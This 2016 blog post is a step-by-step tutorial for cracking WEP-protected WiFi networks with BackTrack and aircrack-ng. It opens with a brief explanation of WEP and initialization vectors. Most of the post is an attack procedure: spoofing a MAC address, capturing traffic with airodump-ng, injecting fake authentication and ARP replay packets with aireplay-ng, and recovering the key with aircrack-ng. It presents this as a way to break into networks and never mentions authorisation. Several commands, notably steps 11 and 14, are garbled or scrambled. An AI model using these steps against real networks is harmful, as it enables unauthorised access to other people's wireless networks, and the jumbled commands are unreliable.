Saturday, April 16, 2016

Wifi HAcking

WiFi HAcking UsINg BackTrack and KaLi LINUX

WiFi hacking become most important part of hacker and user daily life. 
So this technique helps to break WiFi security.

How a wireless network works

A wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. All devices that can connect to a wireless network are known as stations. Stations can be access points (APs), or clients. 

Wireless Encryption
The majority of home and small business networks are encrypted using the two most popular methods:
  1. WEP & WPA

WEP – Wired Equivalent Privacy – comes in 3 different key lengths: 64, 128, and 256 bits, known as WEP 64, WEP 128, and WEP 256 respectively. WEP provides a casual level of security but is more compatible with older devices; therefore, it is still used quite extensively. Each WEP key contains a 24 bit Initialization Vector (IV), and a user-defined or automatically generated key; for instance, WEP 128 is a combination of the 24 bit IV and a user entered 26 digit hex key. ((26*4)+24=128)

Packets and IVs
It’s all in the packets. The bottom line is – while you may be able to employ several security features on your WLAN – anything you broadcast over the air can be intercepted, and could be used to compromise the security on your network. If that frightens you, start stringing wires throughout your home.
Every encrypted packet contains a 24 or 48 bit IV, depending on the type of encryption used. Since the pre-shared key is static and could be easily obtained, the purpose of the IV is to encrypt each packet with a different key. For example, to avoid a duplicate encryption key in every packet sent, the IV is constantly changing. The IV must be known to the client that received the encrypted packet in order to decrypt it; therefore, it is sent in plaintext.

Step 1:-
First Download Backtrack 

Step 2:-
Burn the iso image on CD and boot your laptop from CD drive

Step 3:-
Select the third boot option(VESA/KDE).

Step 4:-
Once in BT3, click the tiny black box in the lower left corner to load up a 
"Konsole" window.

Step 5:-
Type the following command
Note down the interface name. In this example wifi0

Step 6:-
airmon-ng stop wifi0

Step 7:-
ifconfig wifi0 down

Step 8:-
macchanger --mac 00:11:22:33:44:66 wifi0

Step 9:-
airmon-ng start wifi0

Step 10:-
airodump-ng wifi0
This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Notedown BSSID, CH and ESSID somewhere in notepad or paper
Note that if the same BSSID is available in the second part with STATION associated with it,
means you some one is accessing that network and our task will be little easier. 
If not than don’t worry we will still crack it.

Step 11:-
airodump-ng -c (channel) -w (file name)
(channel) with the CH which u had already n
(file name) with any name of your choice
(bssid) with the BSSID which u had already note
--bssid (bssid) wifi0
Note it
Leave this console as it is and start new konsole

Step 12:-
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don’t get Association Successful mesage then keep on trying until
you got success.

Step 13:-
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well if you don’t see ARP ACK and sent packets are not increasing or still 0
than it means no 1 is
accessing that network.But don’t worry you go an optional step,
Leave this console as it is and start new k

Step 14:-
aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF
message than keep on trying until you get success
got an optional step
–b (bssid) –h 00:11:22:33:44:66 wfi0
Press y and enter
Now you will see that ARP and ACK packets in 2nd console are increasing fast
Keep this console as it is and start 4th console.

Step 15:-
aircrack-ng -b (bssid) (filename)-
Just wait and watch…..Backtrack will do rest of the work.
Hurray we got the key.



Post a Comment